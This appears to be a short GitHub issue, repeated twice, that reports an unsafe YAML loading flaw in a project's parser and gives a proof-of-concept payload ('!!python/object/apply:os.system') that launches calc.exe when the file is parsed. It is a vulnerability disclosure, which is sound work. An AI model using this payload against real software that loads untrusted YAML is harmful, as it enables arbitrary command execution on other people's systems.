#coding=utf-8
from definitions import Parser
a = Parser._load('C:\Users\Administrator\Desktop\simple.yaml')
#'C:\Users\Administrator\Desktop\simple.yaml':!!python/object/apply:os.system ["calc.exe"]
Hi, there is a vulnerability in load() method in parser.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered:
#coding=utf-8
from definitions import Parser
a = Parser._load('C:\Users\Administrator\Desktop\simple.yaml')
#'C:\Users\Administrator\Desktop\simple.yaml':!!python/object/apply:os.system ["calc.exe"]
Hi, there is a vulnerability in load() method in parser.py, please see PoC above. It can execute arbitrary python commands resulting in command execution.
The text was updated successfully, but these errors were encountered: